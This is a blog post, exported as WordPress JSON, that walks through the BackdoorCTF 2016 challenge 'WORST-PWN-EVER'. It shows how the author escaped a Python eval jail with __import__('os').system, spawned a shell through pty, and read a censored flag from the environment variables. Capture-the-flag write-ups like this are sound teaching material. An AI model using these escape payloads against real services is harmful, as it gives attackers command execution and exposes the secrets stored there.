{"id":12987,"date":"2016-06-23T18:58:50","date_gmt":"2016-06-23T16:58:50","guid":{"rendered":"http:\/\/www.codilime.com\/?p=12987"},"modified":"2016-11-03T17:27:30","modified_gmt":"2016-11-03T16:27:30","slug":"backdoorctf16-worst-pwn-ever","status":"publish","type":"post","link":"https:\/\/codisec.com\/backdoorctf16-worst-pwn-ever\/","title":{"rendered":"WORST-PWN-EVER"},"content":{"rendered":"

Link: https:\/\/backdoor.sdslabs.co\/challenges\/WORST-PWN-EVER<\/a>
\nAuthor: Ashish Chaudhary
\nPoints: 100
\nCategory: pwn, Python<\/p>\n

Description<\/h2>\n

tocttou is an enviornmentalist. But some say he has a vicious motive and he uses nature to hide his dark side. We found a weird shell on his amazon (pun inteded) web services. Can you tell us what is he upto?<\/p>\n

Tip: he might shut down the machine if he notices you – and he will (maybe in 45 seconds).
\nAccess: nc hack.bckdr.in 9008<\/p><\/blockquote>\n

tl;dr<\/h2>\n

We have been given an Python eval jail over a TCP socket. The solution is to retreive an environment variable using one of the classic builtin hacks, for example: __import__(‘os’).system(‘env|grep -iE “.*f.*l.*a.*g”‘)<\/span><\/p>\n

Solution<\/h2>\n

After establishing a connection to the given server a prompt is returned. Let’s try some random fuzzing.<\/p>\n

First let’s see what happens when we press CTRL+D<\/code> right away:<\/p>\n

> EOFError: EOF when reading a line\n--> WHAT ARE YOU DOING HERE? >-[<\/pre>\n

Let’s check if it is a system shell:<\/p>\n

> echo x\nSyntaxError: unexpected EOF while parsing (, line 1)\n--> WHAT ARE YOU DOING HERE? >-[\n<\/pre>\n

No, it’s definitely not a system shell. It looks like a Python interpreter. Let’s check this theory then:<\/p>\n

> 1+1\n<\/pre>\n

No response, no error – it looks promising. Let’s check then if we can see some Python errors:<\/p>\n

\n> 1+'x'*[]\nTypeError: can't multiply sequence by non-int of type 'list'\n<\/pre>\n

Bingo! If it really is an old eval<\/code> jail, then we could escape using a classic builtin hacks.<\/p>\n

Let’s check that:<\/p>\n

> str(__import__('os').system('echo x'))\nx\n<\/pre>\n

Got it! Let’s get a shell and start looking around:<\/p>\n

> __import__('pty').spawn('\/bin\/sh')\nsh-4.3#\n<\/pre>\n

After looking through available files for a few minutes and finding nothing useful, we noticed the task description contains a clue – the word environmentalist<\/em> suggests checking environment variables.<\/p>\n

\nsh-4.3# env\nHOSTNAME=43523caef67d\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\n_F_L_A_G_='xxxxxxxxxxxxxxx CENSORED xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'\nPWD=\/scripts\nSHLVL=3\nHOME=\/root\n_=\/usr\/bin\/env\n<\/pre>\n","protected":false},"excerpt":{"rendered":"

Link: https:\/\/backdoor.sdslabs.co\/challenges\/WORST-PWN-EVER Author: Ashish Chaudhary Points: 100 Category: pwn, Python Description tocttou is an enviornmentalist. But some say he has a vicious motive and he uses nature to hide his dark side. We found a weird shell on his amazon…<\/span> <\/p>\n

Read more ›<\/div>\n

<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[16],"tags":[7,19],"yoast_head":"\n\n\n\n\n\n\n\n\n\n\n\n\t\n